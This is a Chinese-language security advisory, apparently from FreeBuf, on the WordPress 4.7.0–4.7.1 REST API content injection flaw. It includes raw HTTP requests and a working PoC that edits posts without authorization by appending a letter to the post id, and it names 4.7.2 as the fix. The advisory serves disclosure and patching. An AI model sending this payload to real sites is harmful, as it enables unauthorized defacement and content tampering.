WordPress又曝漏洞:REST API由於許可權控制失效致內容注入
WordPress最近曝出內容注入漏洞,影響到REST API——來自Sucuri的安全研究人員最先發現該漏洞。
未經授權的攻擊者利用該漏洞可注入惡意內容,以及進行提權,對文章、頁面等內容進行修改。REST API是最近添加到WordPress 4.7.0並默認啟用的。
鑒於WordPress使用的廣泛性,該漏洞的影響還是比較大的。使用 WordPress REST API 是簡便高效的通過 JSON 格式傳輸數據訪問或控制 WordPress 站點內容的方法。API 提供了對用戶、文章、分類等不同功能的控制,也可以通過 API 檢索或修改文章。
WordPress REST API 插件在 4.70 集成到 WordPress 中,由於許可權控制失效導致內容注入或修改。WordPress開發團隊已經與Sucuri配合在最新的4.7.2版本中修復了該漏洞。
漏洞名稱
:WordPress REST API 內容注入/許可權提升
影響版本
:4.7.0 – 4.7.1
漏洞詳情:
WordPress 在 4.7.0 版本後集成了原 REST API 插件的功能
Permalinks設置為非Plain模式
使用 WordPress 程序的網站首頁上會有:
API 地址則為:http://www.xxx.com/wp-json/
查看文章列表
GET /index.php/wp-json/wp/v2/posts HTTP/1.1
Host: xxx.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36
Content-Length: 4
根據文章列表可以找到對應的id
檢索文章
GET /index.php/wp-json/wp/v2/posts/500 HTTP/1.1
Host: xxx.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36
Content-Length: 4
修改文章
POST /index.php/wp-json/wp/v2/posts/500?id=500 HTTP/1.1
Host: xxx.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36
Content-Type: application/json
Content-Length: 43
{"title":"x x x x"}
如果返回 401 則無許可權修改
詳細的 API 使用方法見:http://v2.wp-api.org/
漏洞PoC:
POST /index.php/wp-json/wp/v2/posts/500?id=500a HTTP/1.1
Host: xxx.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36
Content-Type: application/json
Content-Length: 43
{"title":"xxxx"}
返回 200 修改成功
修復方案
:升級到 4.7.2
參考來源:
https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
http://v2.wp-api.org/
* 本文作者漏洞盒子,轉載請註明來自FreeBuf.COM
※使用Sysmon和Splunk探測網路環境中橫向滲透
※MBR勒索木馬再度來襲:GoldenEye分析
※2016年的黑客活動對政治造成了哪些影響 | FreeBuf年終策劃
TAG:FreeBuf |
※新曝WordPress REST API內容注入漏洞詳解
※ASP.NET Core MVC 控制器創建與依賴注入
※Onitsuka Tiger鬼塚虎「TIGER CORSAIR」復刻系列,為當下潮搭注入經典之魂!
※通過APC實現Dll注入——繞過Sysmon監控
※ThinkPHP5 SQL注入漏洞&PDO真/偽預處理分析
※Oracle在OpenWorld上宣布要將AI注入更多雲應用中
※Katyusha掃描器:基於Telegram的全自動SQL注入工具
※注入新資金 HPE為「The Machine」制定發展藍圖
※Hibernate HQL注入攻擊入門
※新鮮血液注入!Paradis3新品即將上架DSM!
※Android系統中也存在Web注入嗎?
※小心!Google Play 中出現首個使用代碼注入Android惡意軟體——Dvmap
※Teva x BEDWIN & THE HEARTBREAKERS 日系成熟風注入
※給你的街頭腕錶注入藝術氣息,Eric Haze x Casio G-SHOCK別注腕錶新作
※PSNY 全新配色曝光!橄欖綠注入 Air Jordan 12 鞋型
※經典元素注入,夏日Nike Sock Dart推出Safari系列
※如何使用加密的Payload來識別並利用SQL注入漏洞
※日本傳統藍染注入-Vans 推出全新「Japan Blue Collection」
※如何使用加密的Payload來識別並利用SQL注入漏洞?